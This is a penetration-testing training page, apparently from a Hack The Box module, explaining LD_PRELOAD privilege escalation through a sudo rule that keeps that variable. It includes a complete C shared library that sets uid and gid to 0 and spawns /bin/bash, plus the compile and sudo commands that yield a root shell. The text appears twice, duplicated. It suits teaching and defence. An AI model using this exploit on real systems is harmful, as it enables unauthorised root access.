Shared Libraries

PreviousHijacking Tmux Sessions NextShared Object Hijacking

Last updated 5 months ago

Shared Libraries

The LD_PRELOAD environment variable is used to specify one or more shared libraries (.so files) to be loaded by the loader before all others, including the standard C library (libc.so). This process is known as preloading a library.

However, to maintain system security and prevent this feature from being exploited, particularly with suid/sgid executables, the system enforces certain conditions:

The loader disregards LD_PRELOAD for executables where the real user ID (ruid) does not match the effective user ID (euid).
For executables with suid/sgid, only libraries in standard paths that are also suid/sgid are preloaded.

Privilege escalation can occur if you have the ability to execute commands with sudo and the output of sudo -l includes the statement env_keep+=LD_PRELOAD. This configuration allows the LD_PRELOAD environment variable to persist and be recognized even when commands are run with sudo, potentially leading to the execution of arbitrary code with elevated privileges.

htb-student@NIX02:~$ sudo -l
Matching Defaults entries for htb-student on NIX02:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin, env_keep+=LD_PRELOAD

User htb-student may run the following commands on NIX02:
    (root) NOPASSWD: /usr/bin/openssl

For example: This user has rights to use openssl as root, but since this is NOT a and the /etc/sudoers entry is written specifying the absolute path, this could not be used to escalate privileges under normal circumstances. However, we can exploit the LD_PRELOAD issue to run a custom shared library file.

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>

void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}

htb-student@NIX02:~$ gcc -fPIC -shared -o [root.so](<http://root.so/>) exploit.c -nostartfiles
htb-student@NIX02:~$ sudo LD_PRELOAD=/home/htb-student/root.so /usr/bin/openssl
root@NIX02:~# id
uid=0(root) gid=0(root) groups=0(root)

PreviousHijacking Tmux Sessions NextShared Object Hijacking

Last updated 5 months ago

However, to maintain system security and prevent this feature from being exploited, particularly with suid/sgid executables, the system enforces certain conditions:

The loader disregards LD_PRELOAD for executables where the real user ID (ruid) does not match the effective user ID (euid).
For executables with suid/sgid, only libraries in standard paths that are also suid/sgid are preloaded.

htb-student@NIX02:~$ sudo -l
Matching Defaults entries for htb-student on NIX02:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin, env_keep+=LD_PRELOAD

User htb-student may run the following commands on NIX02:
    (root) NOPASSWD: /usr/bin/openssl

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>

void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}

htb-student@NIX02:~$ gcc -fPIC -shared -o [root.so](<http://root.so/>) exploit.c -nostartfiles
htb-student@NIX02:~$ sudo LD_PRELOAD=/home/htb-student/root.so /usr/bin/openssl
root@NIX02:~# id
uid=0(root) gid=0(root) groups=0(root)